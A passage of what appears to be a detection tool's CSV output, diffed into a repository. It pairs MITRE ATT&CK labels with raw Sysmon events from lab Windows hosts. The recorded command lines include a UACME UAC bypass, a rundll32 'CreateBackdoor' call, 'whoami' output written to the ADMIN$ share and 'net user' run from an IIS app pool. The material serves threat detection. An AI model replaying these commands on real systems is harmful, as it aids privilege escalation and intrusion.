+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
+    <Data Name=""ParentProcessId"">1740</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C: ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T09:46:49.402550Z"">
+    </TimeCreated>
+    <EventRecordID>5134</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 09:46:49.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-5809-5D45-0000-00100B233F00</Data>
+    <Data Name=""ProcessId"">1380</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C:</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4EA-5D45-0000-00105CD60000</Data>
+    <Data Name=""ParentProcessId"">1072</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
+    </TimeCreated>
+    <EventRecordID>243565</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
+    <Data Name=""ProcessId"">3536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami  /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:35:13.543589Z"">
+    </TimeCreated>
+    <EventRecordID>9840</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:35:13.527</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-00108DC71E00</Data>
+    <Data Name=""ProcessId"">692</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami  /all </Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
+    <Data Name=""LogonId"">0x1ea3c6</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
+    <Data Name=""ParentProcessId"">1256</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-20T22:35:26.755693Z"">
+    </TimeCreated>
+    <EventRecordID>422746</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3408"" ThreadID=""4448"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-20 22:35:26.747</Data>
+    <Data Name=""ProcessGuid"">747F3D96-662E-5F8F-0000-001023353800</Data>
+    <Data Name=""ProcessId"">6748</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Provider Host</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-E130-5F8F-0000-0020E4030000</Data>
+    <Data Name=""LogonId"">0x3e4</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">840</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:05:36.555348Z"">
+    </TimeCreated>
+    <EventRecordID>342408</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:05:36.545</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E920-5F33-0000-001043920A00</Data>
+    <Data Name=""ProcessId"">5128</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
+    <Data Name=""LogonId"">0x41c24</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E914-5F33-0000-001009990500</Data>
+    <Data Name=""ParentProcessId"">5144</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T09:46:48.924858Z"">
+    </TimeCreated>
+    <EventRecordID>5133</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
+    <Data Name=""UtcTime"">2019-08-03 09:46:48.842</Data>
+    <Data Name=""ProcessGuid"">747F3D96-5808-5D45-0000-0010D1FE3E00</Data>
+    <Data Name=""ProcessId"">1268</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Task Scheduler Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
+    <Data Name=""LogonId"">0x18d3fb</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-5808-5D45-0000-00106CDC3E00</Data>
+    <Data Name=""ParentProcessId"">924</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
+    <Data Name=""ParentCommandLine"">UACME.exe  34</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:35:13.512339Z"">
+    </TimeCreated>
+    <EventRecordID>9839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:35:13.512</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
+    <Data Name=""ProcessId"">1256</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
+    <Data Name=""LogonId"">0x1ea3c6</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
+    <Data Name=""ParentProcessId"">3572</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net  user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
+    </TimeCreated>
+    <EventRecordID>1046</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
+    <Data Name=""ProcessId"">788</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  user</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
+    <Data Name=""LogonId"">0x9cf992</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
+    <Data Name=""ParentProcessId"">2404</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami  /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.371714Z"">
+    </TimeCreated>
+    <EventRecordID>9829</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.356</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010373E1D00</Data>
+    <Data Name=""ProcessId"">3328</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami  /all </Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
+    <Data Name=""ParentProcessId"">2828</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net  user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
+    </TimeCreated>
+    <EventRecordID>1046</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
+    <Data Name=""ProcessId"">788</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  user</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
